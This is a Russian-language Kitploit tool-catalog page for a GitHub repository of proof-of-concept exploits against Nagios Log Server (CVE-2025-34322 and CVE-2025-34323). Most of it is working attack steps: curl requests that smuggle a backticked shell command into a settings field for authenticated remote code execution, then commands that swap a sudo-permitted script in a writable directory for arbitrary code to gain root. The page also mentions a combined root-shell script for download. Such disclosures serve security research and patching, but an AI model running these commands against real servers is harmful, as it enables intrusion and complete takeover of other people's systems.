Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server — Эксплойты Proof of Concept для CVE-2025-34322 и CVE-2025-34323 в Nagios Log Server | Kitploit
Инструменты/GitHubGitHub/mcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubmcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server

CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойты Proof of Concept для CVE-2025-34322 и CVE-2025-34323 в Nagios Log Server

Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-34322 и CVE-2025-34323 Nagios Log Server

Эксплойты Proof of Concept для CVE-2025-34322 и CVE-2025-34323 в Nagios Log Server, а также комбинированный скрипт для получения оболочки с правами root.

CVE-2025-34322

После аутентификации замените ваш идентификатор сессии в этих двух командах curl. Первая задаёт команду для выполнения, следующая выполнит её:

root@kitploit:~
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query

CVE-2025-34323

Пользователь www-data имеет права sudo для запуска следующего скрипта от имени root:

root@kitploit:~
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh

и каталог /usr/local/nagioslogserver/scripts доступен для записи

root@kitploit:~
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios   4.0K Sep  7 16:34 .
drwxr-xr-x 12 root   root     4.0K Sep  7 16:29 ..
drwxrwxr-x  4 nagios nagios   4.0K Sep  7 16:20 etc
-rw-r--r--  1 root   root        0 Sep  7 16:34 .installed
drwxr-xr-x 14 nagios nagios   4.0K Sep  7 16:29 logstash
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:20 mibs
drwxr-xr-x 12 nagios nagios   4.0K Sep  7 16:20 opensearch
drwxrwxr-x  5 nagios nagios   4.0K Sep  7 16:20 pythonvenv
drwxrwxr-x  3 nagios nagios   4.0K Sep  7 16:20 scripts
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:36 snapshots
drwxrwxr-x  3 nagios www-data 4.0K Sep  7 16:36 tmp
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:31 var

поскольку пользователь www-data является членом группы nagios. Поэтому пользователь www-data может перемещать любые файлы в этом каталоге независимо от прав владельца. Следующие команды перемещают файл ( reconfigure_ncpa.sh ), который пользователь www-data может выполнять с правами sudo, а затем заменяют его новым файлом, содержащим произвольные команды:

root@kitploit:~
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
Скачать инструмент